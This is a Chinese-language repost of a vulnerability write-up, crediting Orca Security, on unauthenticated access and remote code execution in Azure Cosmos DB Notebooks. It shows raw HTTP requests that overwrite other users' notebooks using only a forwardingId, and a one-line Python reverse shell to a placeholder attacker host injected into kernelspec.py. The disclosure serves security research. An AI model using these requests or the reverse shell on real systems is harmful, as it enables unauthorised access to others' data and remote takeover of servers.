前言
Azure Cosmos DB Notebook是一个用于在Azure Cosmos DB中进行数据分析和查询的工具。它提供了一个交互式的环境,使用Jupyter Notebook的方式编写和执行查询、分析数据。用户可以在Notebook中编写代码来连接到Azure Cosmos DB的数据库和容器,执行多种语言来操作数据,还可以进行实时数据流处理等操作。
正文
主页面如下:
创建新的 Notebook 时,存在该请求包:
POST
/api/controlplane/toolscontainer/cosmosaccounts/subscriptions/[tenant-id]/resourceGroups/Orca-Research/providers/Microsoft.DocumentDB/databaseAccounts/orca-cosmos-dev/containerconnections/multicontainer HTTP/2
Host: tools.cosmos.azure.com
Content-Length: 88
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Authorization: Bearer
eyJ0eXAiOiJKV1QiLdaaaxxWMFRPSSIsImtpZCI6IjJaUXBKM1VwYmpBWVhZR2FYRUpsOGxWMFRPSSJ9.eyJhdWQddaaam5ldC8yMjdkY2ExZC1
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: /
Origin: https://cosmos.azure.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://cosmos.azure.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-IL,en;q=0.9,he-IL;q=0.8,he;q=0.7,en-US;q=0.6,pl;q=0.5
{"cosmosEndpoint":"https://orca-cosmos-dev.documents.azure.com:443/","poolId":"default"}
返回包如下:
可以看到,服务器返回了forwardingId,这个值将会存在于后续请求包的API接口中。
在渗透测试过程中,攻击者的forwardingId为27f180bc-cf93-4c42-b23e-f27a5085da57:
通过测试发现,该接口用于列出同一台服务器的不同notebooks:
https://seasia.tools.cosmos.azure.com:10007/api/containergateway/27f180bc-cf93-4c42-b23e-f27a5085da57(即forwardingId)/api/contents/notebooks
通过删除请求头Authorization并观察返回包可知,该接口存在未授权漏洞:
经过后续测试,发现全站接口均存在未授权漏洞,即只要知道受害者的forwardingId,就可以利用所有接口,对受害者的notebook进行读写访问修改等操作)。
证明如下:
1、利用该接口获取kernels_id
/api/containergateway/[forwardingId]/api/kernels/
2、任意Notebook代码覆盖、删除等
在 Notebook 中编写代码:
保存:
请求包如下:
将Get请求修改为PUT请求,并利用返回包内容来构造Json请求体,发送至服务器:
PUT
/api/containergateway/27f180bc-cf93-4c42-b23e-f27a5085da57/api/contents/notebooks/Untitled.ipynb HTTP/2
Host: [seasia.tools.cosmos.azure.com:1000](<http://seasia.tools.cosmos.azure.com:10005/>)7
Content-Length: 983
Sec-Ch-Ua: "Google Chrome";v="105", "Not)A;Brand";v="8", "Chromium";v="105"
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: [<https://cosmos.azure.com>](<https://cosmos.azure.com/>)
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: [<https://cosmos.azure.com/>](<https://cosmos.azure.com/>)
Accept-Encoding: gzip, deflate
Accept-Language: en-IL,en;q=0.9,he-IL;q=0.8,he;q=0.7,en-US;q=0.6,pl;q=0.5
{"kernel":{"id":null,"name":"python3"},"name":"",
"content": {"cells": [{"cell_type": "code", "execution_count": 1, "id": "47bdbef0-ea14-4960-8789-7983e63312dd", "metadata": {"collapsed": true, "execution": {"iopub.execute_input": "2022-10-02T08:06:27.283Z", "iopub.status.busy": "2022-10-02T08:06:27.277Z", "iopub.status.idle": "2022-10-02T08:06:27.299Z", "shell.execute_reply": "2022-10-02T08:06:27.292Z"}, "jupyter": {"outputs_hidden": false, "source_hidden": false}, "nteract": {"transient": {"deleting": false}}, "trusted": true}, "outputs": [{"name": "stdout", "output_type": "stream", "text": "hacked\n"}], "source": "print('Hacked!')"}], "metadata": {"language_info": {"file_extension": "ipynb", "mimetype": "application/json", "name": "python", "version": "3.7"}, "nteract": {"version": "dataExplorer 1.0"}}, "nbformat": 4, "nbformat_minor": 5}, "format": "json", "mimetype": null, "size": 993, "writable": true, "path":"notebooks/Untitled.ipynb","type":"notebook"}
在浏览器刷新页面后,可以看到请求体内容已将原有Notebook中的代码覆盖:
同时,我们也可以执行删除代码等操作。
经过后续测试发现,使用 Azure UI 加载 Cosmos 数据资源管理器时,该api将用于构建资源管理器仪表板:
/home/cosmosuser/.local/lib/python3.6/site-packages/jupyter_client/kernelspec.py
我们仍然可以覆盖/home/cosmosuser目录中的所有文件,包括该kernelspec.py文件。
现将GET请求修改为PUT,并在请求体中添加py文件原始内容及以下反向shell脚本:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKER_ID\",ATTACKER_PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")
发送请求并刷新页面后,RCE成功:
原文出处:
https://orca.security/resources/blog/cosmiss-vulnerability-azure-cosmos-db/
原文始发于微信公众号(芳华绝代安全团队):RCE 之 Azure Cosmos DB Notebook
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论